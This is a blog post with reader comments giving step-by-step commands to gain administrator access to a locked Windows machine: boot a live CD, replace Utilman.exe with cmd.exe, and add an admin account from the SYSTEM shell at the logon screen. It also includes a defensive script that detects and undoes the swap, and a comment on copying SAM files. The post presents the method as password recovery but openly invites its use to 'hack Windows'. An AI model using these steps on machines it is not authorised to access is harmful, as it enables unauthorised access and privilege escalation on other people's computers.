Hack Windows: Create a new admin account

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to hack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted with me via my website saying “I forgot my password”, or “my kid locked himself out of his PC”. I’m unsure if that’s really the case or if they were just looking for a way to hack Windows passwords. However, if that is really the case, there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of Offensive Security’s BackTrack Live CD.

What is BackTrack and how do I hack Windows with it?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window
Hack Windows and make a new user account

Here’s a quick and dirty way to make a new user account.

Boot into BackTrack and open a shell prompt:

  • cd /mnt (change directory to mounted drives)
  • ls (get the list of mounted drives)
  • cd sda1 (sda1 is the main hard drive)
  • cd Windows/ (change to the windows directory)
  • cd System32/ (change to the system directory)
  • mv Utilman.exe Utilman.old (backup original file)
  • cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
  • reboot

Once rebooted, at the Vista logon screen do the following:

  • Press Windows key + U to invoke Utility Manager (a.k.a. cmd.exe).
  • cmd.exe will spawn with ‘System’ privileges.
  • c:\>net user S00perAdmin mypassword /add
  • c:\>net localgroup administrators S00perAdmin /add
  • Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” your “lost” password you can simply create a new Administrator account, log in with that and then change the lost account’s password to what you want it to be.
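
The steps above stop with cmd.exe still sitting in place of Utilman.exe, so the logon-screen hotkey keeps opening a ‘System’ shell until the original file is put back. The script below is an added example, not part of the original post: run from the same live-CD shell against the mounted System32 directory, it reports whether the swap is present and restores the backup. The function names are hypothetical; the file names are the ones used in the steps above.

```bash
#!/bin/sh
# Added example: audit a mounted Windows System32 directory for the
# Utilman.exe swap described in the post. Function names are hypothetical;
# file names follow the post's steps.

# Prints one of: replaced | backup-left | clean | missing
check_utilman() {
    dir=$1
    if [ ! -f "$dir/Utilman.exe" ] || [ ! -f "$dir/cmd.exe" ]; then
        echo missing
        return 2
    fi
    # Byte-for-byte comparison: Utilman.exe identical to cmd.exe means the
    # logon-screen hotkey launches a command shell instead of Utility Manager.
    if cmp -s "$dir/Utilman.exe" "$dir/cmd.exe"; then
        echo replaced
        return 1
    fi
    # Utilman.exe differs from cmd.exe, but a renamed copy from the
    # post's "mv" step is still lying around.
    if [ -f "$dir/Utilman.old" ]; then
        echo backup-left
        return 1
    fi
    echo clean
    return 0
}

# Put the original binary back, only when the swap is confirmed and the
# backup made by the post's "mv" step is still there.
restore_utilman() {
    dir=$1
    state=$(check_utilman "$dir") || true
    [ "$state" = replaced ] || { echo "nothing to restore ($state)"; return 1; }
    [ -f "$dir/Utilman.old" ] || { echo "no Utilman.old backup"; return 1; }
    mv -f "$dir/Utilman.old" "$dir/Utilman.exe"
    check_utilman "$dir"
}
```

For example, `check_utilman /mnt/sda1/Windows/System32` prints `replaced` on a machine left in the state the steps above produce, and `restore_utilman` with the same argument returns it to `clean`.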


11 Responses to “Hack Windows: Create a new admin account”

  1. Scott August 23, 2008 at 2:38 pm #

    This step-by-step instruction is incomplete. It leaves a copy of cmd.exe as utilman.exe and the hotkeys will continue to provide a system privilege command shell at the secure desktop login screen. It’s like a security/firedoor with multiple deadbolt locks (and a master key under the welcome mat).

  2. stephanie June 12, 2009 at 5:50 am #

    If you create a new Admin account, what will happen to the old Admin account? Does that mean that there will be two Administrator accounts? Please reply ASAP. Thanks :)

  3. PaulSpoerry June 12, 2009 at 6:07 am #

    You’d have both accounts. There is no issue with a Windows machine having multiple administrator accounts.

  4. schwadegan January 10, 2010 at 5:14 pm #

    Hi there Paul,
    I have a couple of questions regarding this method you’ve posted and would appreciate if you took the time to answer them.

    First off, how likely is it that this solution would work on Windows7?

    Secondly,
    c:\>net user S00perAdmin mypassword /add
    Written like that, I assume the name of the account would be S00perAdmin followed by my password of choice – however can I just ignore typing a password to leave it without one? (And is it always “localgroup administrators” or may it differ depending on region?)

    Really appreciate you wrote this guide, hoping you’ll answer my questions as well,
    Lenny.

  5. PaulSpoerry January 10, 2010 at 5:24 pm #

    Given that 7 is built off of Vista, it’s pretty damned likely. That said, I haven’t tried it myself.

    You should never use an account without a password. If you need one without a PW use the built in guest account.

  6. annyyu22 May 9, 2010 at 8:31 pm #

    This sounds pretty interesting. We used a similar software at my tech support job a few years ago. Called “Windows Password Key 8.0”.
    It works very perfect to regain your password. Also use boot CD/DVD.

  7. S00perAdmin July 3, 2011 at 12:35 am #

    Great article.
    Just used BackTrack 5 to create a S00perAdmin on Windows 7 Sp1.

    (Needed it to resolve ms kb947215)

    Solution worked almost perfectly.

    My drive didn’t auto mount so I needed to do the following in addition to the above steps:
    mkdir mnt/sda1
    mount /dev/sda1 mnt/sda1

    Thanks again.

  8. d3 September 29, 2011 at 4:42 am #

    You don’t need backtrack, you can use any live CD distribution that can mount NTFS volumes, almost every liveCD can do it.

  9. duder October 25, 2011 at 1:01 pm #

    Nahh just use HBCD (Hiren’s Boot CD), it’s a portable (hacked”ish”) XP with tools ranging from MBR editing – to copying all stored serials…. and it can copy Windows folder attributes….

    I have learned that you can just carry some certain files found in the “system32\config” directory and overwrite them on any Windows computer to use a portable ‘universal’ account file “SAM”. Of course it only works on that OS….

  10. Ken December 7, 2011 at 1:06 pm #

    I’ve had this Demo unit I purchased and can’t get into it, I’ve had the darned thing a year or more now and my wife needs to have her own stand alone unit for returning to school at 50, we are BROKE, I don’t have VISA, can’t pay anything, just got back from the food bank. Can anybody offer me a simple FREE way to gain access? Please help ???

  11. hilaree February 7, 2012 at 12:32 am #

    I have managed to get BackTrack and used it to get to the cmd.exe as utilman.exe. I was able to set a new password but the net local group administrators sooperadmin/add has me confused (I’m not good at the computer lingo). How exactly should it be entered into the cmd?
